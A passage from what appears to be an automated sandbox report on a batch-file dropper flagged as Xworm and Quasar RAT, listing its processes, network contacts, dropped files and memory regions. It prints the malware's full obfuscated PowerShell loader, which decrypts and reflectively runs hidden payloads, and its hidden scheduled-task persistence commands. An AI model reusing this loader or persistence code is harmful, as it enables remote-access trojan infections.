SHA256 9151798d6f1e77daf9a6a495917d50bb3dc2f8b224fc29ee830caf4b3195fe26
SHA512 558240ecabdcaeed3c2358fdebb718e49f7f2b5b4d4735c2c16809c727d88c5cca141b27af9ff0daccfb52208851a9251abd06ed2ac75cb496c228dc06da59fb

memory/3180-103-0x00007FF8175E0000-0x00007FF8180A1000-memory.dmp

memory/3180-108-0x0000020D3FBD0000-0x0000020D3FBE0000-memory.dmp

memory/3180-109-0x0000020D3FBD0000-0x0000020D3FBE0000-memory.dmp

memory/3180-111-0x0000020D3FB20000-0x0000020D3FB2E000-memory.dmp

memory/2028-112-0x00007FF8175E0000-0x00007FF8180A1000-memory.dmp

memory/5096-113-0x00007FF8175E0000-0x00007FF8180A1000-memory.dmp

memory/5096-114-0x000001D6DBF60000-0x000001D6DBF70000-memory.dmp

memory/5096-115-0x000001D6DBF60000-0x000001D6DBF70000-memory.dmp

memory/5096-116-0x000001D6DBF60000-0x000001D6DBF70000-memory.dmp

memory/3180-117-0x00007FF8175E0000-0x00007FF8180A1000-memory.dmp

memory/3180-118-0x0000020D3FBD0000-0x0000020D3FBE0000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-04-13 17:59

Reported

2024-04-13 18:01

Platform

win11-20240412-en

Max time kernel

54s

Max time network

62s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Double.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-801765966-3955847401-2235691403-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-801765966-3955847401-2235691403-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2412 wrote to memory of 4116 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 4116 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4116 wrote to memory of 4408 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4116 wrote to memory of 4408 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4116 wrote to memory of 1088 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4116 wrote to memory of 1088 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 1088 wrote to memory of 1400 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1088 wrote to memory of 1400 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1400 wrote to memory of 3932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1400 wrote to memory of 3932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3932 wrote to memory of 1768 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3932 wrote to memory of 1768 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1768 wrote to memory of 3728 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1768 wrote to memory of 3728 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3728 wrote to memory of 236 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3728 wrote to memory of 236 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3728 wrote to memory of 3572 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 3728 wrote to memory of 3572 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 3572 wrote to memory of 4360 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3572 wrote to memory of 4360 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4360 wrote to memory of 4120 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4360 wrote to memory of 4120 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Double.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Double.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Double.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_824_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_824.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_824.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_824.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_824.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_824.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_490_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_490.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_490.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_490.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_490.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_490.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Network

Country Destination Domain Proto
US 8.8.8.8:53 express-divorce.gl.at.ply.gg udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 8.8.8.8:53 18.221.185.147.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.19:24820 traffic-collins.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c3pqlkgi.ijq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4116-8-0x0000020D78F20000-0x0000020D78F42000-memory.dmp

memory/4116-9-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

memory/4116-10-0x0000020D79190000-0x0000020D791A0000-memory.dmp

memory/4116-11-0x0000020D79190000-0x0000020D791A0000-memory.dmp

memory/4116-12-0x0000020D79190000-0x0000020D791A0000-memory.dmp

memory/4116-13-0x0000020D78F10000-0x0000020D78F18000-memory.dmp

memory/4116-14-0x0000020D793A0000-0x0000020D794E0000-memory.dmp

memory/4408-16-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

memory/4408-17-0x000001CD51E50000-0x000001CD51E60000-memory.dmp

memory/4408-26-0x000001CD51E50000-0x000001CD51E60000-memory.dmp

memory/4408-29-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 df472dcddb36aa24247f8c8d8a517bd7
SHA1 6f54967355e507294cbc86662a6fbeedac9d7030
SHA256 e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA512 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 eb15ee5741b379245ca8549cb0d4ecf8
SHA1 3555273945abda3402674aea7a4bff65eb71a783
SHA256 b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636
SHA512 1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4

C:\Users\Admin\AppData\Roaming\startup_str_824.vbs

MD5 3ffd611ef2d18d243ac564e0f7d62821
SHA1 dc263be524db27643cd508db6324a6fa84894ac7
SHA256 b3675ddb7a8616d21671bc2e69dac84890c104c802ba9132a89e0a523a8f1fae
SHA512 9ea8f1655bc51637279d62b86c0b863d233eb187a28fd1130736fe769327bbb51645046385c7fdc850954b5497f25e1794e947be2fc30464fb8307d579f60dce

C:\Users\Admin\AppData\Roaming\startup_str_824.bat

MD5 948386c98184781df692e5f11ff558f7
SHA1 e8619faf83446ea78e456920834579bbf71aea20
SHA256 7da1336453539461c6b6630200259214c3fba0e458c21e15e26545c0816f6c7f
SHA512 0023368d89bf5951b3fc87e4ea8fb84e02a87c0917bd5aef0d5bcc00d5a9de616f4922956a015aa7f748299813876a290b545a309116878506c89de3387148ba

memory/3932-38-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

memory/3932-39-0x000001CE1ADB0000-0x000001CE1ADC0000-memory.dmp

memory/3932-50-0x000001CE1ADB0000-0x000001CE1ADC0000-memory.dmp

memory/4116-49-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

memory/3932-54-0x000001CE33570000-0x000001CE33894000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat

MD5 795363cfbf5d3fca47edc4cbc247a1c0
SHA1 9374d05486b0b62977825d07f748fa03cca3c864
SHA256 84c422d2ccda03230c8eecda7daa2e4ffa00a89d862bed459be52875dde096b6
SHA512 c5f147e4d011342d3518416b0d5d30f5adc8eeadac2b060a94abdd80ef8452a61cca997831d69473a13b52ad7aa8acb2ddf507dd3f49f68dfddaf6cbd7c23c94

memory/4116-57-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

memory/3932-58-0x000001CE33AB0000-0x000001CE33B00000-memory.dmp

memory/3932-59-0x000001CE33BC0000-0x000001CE33C72000-memory.dmp

memory/3932-60-0x000001CE349B0000-0x000001CE34B72000-memory.dmp

memory/3728-61-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

memory/3728-63-0x0000017A181C0000-0x0000017A181D0000-memory.dmp

memory/3728-62-0x0000017A181C0000-0x0000017A181D0000-memory.dmp

memory/3728-72-0x0000017A181C0000-0x0000017A181D0000-memory.dmp

memory/3728-73-0x0000017A322A0000-0x0000017A322A8000-memory.dmp

memory/3728-74-0x0000017A32540000-0x0000017A3254C000-memory.dmp

memory/236-84-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

memory/236-85-0x000001853E1C0000-0x000001853E1D0000-memory.dmp

memory/236-86-0x000001853E1C0000-0x000001853E1D0000-memory.dmp

memory/236-87-0x000001853E1C0000-0x000001853E1D0000-memory.dmp

memory/236-88-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

C:\Users\Admin\AppData\Roaming\startup_str_490.vbs

MD5 73e3c7287bdc5f01d99975b430648c50
SHA1 cc5c980a06300d17deb79d2ba171901fe572d19d
SHA256 90d9885fc42a71dd01bb1075c27c17440fd7c5477be9bcf0fdb11ab31b0129cc
SHA512 12f93c750af16e139b82dfa4a8026f51b79686e8c96a32df84e73f0db9184a88fdf4d6f278d79e055c05ba9e804b96a44bae28c9072ccf034d9f7be05f40a4c8

memory/4120-95-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

memory/4120-96-0x0000023DE80E0000-0x0000023DE80F0000-memory.dmp

memory/4120-105-0x0000023DE80E0000-0x0000023DE80F0000-memory.dmp

memory/4120-107-0x0000023DE80E0000-0x0000023DE80F0000-memory.dmp

memory/4120-108-0x0000023DE8050000-0x0000023DE805E000-memory.dmp

memory/3728-109-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

memory/3932-110-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

memory/3932-111-0x000001CE1ADB0000-0x000001CE1ADC0000-memory.dmp

memory/3932-112-0x000001CE1ADB0000-0x000001CE1ADC0000-memory.dmp

memory/3932-113-0x000001CE1ADB0000-0x000001CE1ADC0000-memory.dmp

memory/4120-114-0x0000023DE80E0000-0x0000023DE80F0000-memory.dmp

memory/4120-115-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

memory/4120-116-0x0000023DE80E0000-0x0000023DE80F0000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-13 17:59

Reported

2024-04-13 18:01

Platform

win10-20240404-en

Max time kernel

38s

Max time network

52s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Double.bat"

Signatures

